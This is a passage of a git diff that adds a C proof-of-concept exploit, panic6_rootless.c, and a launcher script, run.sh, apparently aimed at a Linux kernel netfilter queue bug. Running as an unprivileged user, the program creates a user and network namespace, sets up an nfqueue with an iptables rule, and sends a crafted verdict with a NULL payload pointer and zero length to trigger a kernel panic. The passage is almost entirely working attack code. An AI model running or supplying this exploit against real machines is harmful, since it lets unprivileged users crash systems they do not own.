return EXIT_SUCCESS; +} diff --git a/panic6_rootless.c b/panic6_rootless.c new file mode 100644 index 0000000..2ab6835 --- /dev/null +++ b/panic6_rootless.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// How to compile: +// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) + { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; +} + +void write_file(const char *fn, char *content) +{ + FILE *fptr; + + // use appropriate location if you are using MacOS or Linux + fptr = fopen(fn, "w"); + + if (fptr == NULL) + { + perror("Set user namespace failed!"); + exit(EXIT_FAILURE); + } + + fprintf(fptr, "%s", content); + fclose(fptr); +} + +int main(int argc, char *argv[]) +{ + + uid_t user = geteuid(); + uid_t group = getegid(); + + puts("[*] Creating a network namespace"); + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) != 0) + { + perror("unshare"); + } + + puts("[*] Becoming 'root' in the namespace"); + char tmp_buf[50]; + sprintf(tmp_buf, "0 %d 1", user); + write_file("/proc/self/uid_map", tmp_buf); + write_file("/proc/self/setgroups", "deny"); + sprintf(tmp_buf, "0 %d 1", group); + write_file("/proc/self/gid_map", tmp_buf); + + puts("[*] Enabling loopback inferface in the namespace"); + if (system("./ld-linux.so.1 ./ip link set dev lo up") != 0) + { + perror("ip link set dev lo up"); + exit(EXIT_FAILURE); + } + + size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) + { + perror("mnl_socket_open"); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Linking the nfqueue to a real connection through iptables"); + char cmd[300]; + sprintf(cmd, "./ld-linux.so.1 ./iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d", queue_num); + if (system(cmd) != 0) + { + perror("iptables"); + exit(EXIT_FAILURE); + } + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) + { + perror("mnl_socket_recvfrom"); + exit(EXIT_FAILURE); + } + + puts("[*] Setting the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); // Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Are you still alive? Probably your kernel is not vulnerable :("); + return EXIT_SUCCESS; +} diff --git a/run.sh b/run.sh new file mode 100755 index 0000000..86f9390 --- /dev/null +++ b/run.sh @@ -0,0 +1,18 @@ +#!/usr/bin/env bash + +cd "$(dirname "$0")" + +ARCH=$(uname -m) +if [[ "$ARCH" == x86_64* ]]; then + cd amd64 +elif [[ "$ARCH" == aarch64* ]]; then + cd arm64 +else + echo "Unsupported architecture: $ARCH" + exit 1 +fi + +export XTABLES_LIBDIR=./xtables +export LD_LIBRARY_PATH=./ +exec ./ld-linux.so.1 ./nfpanic +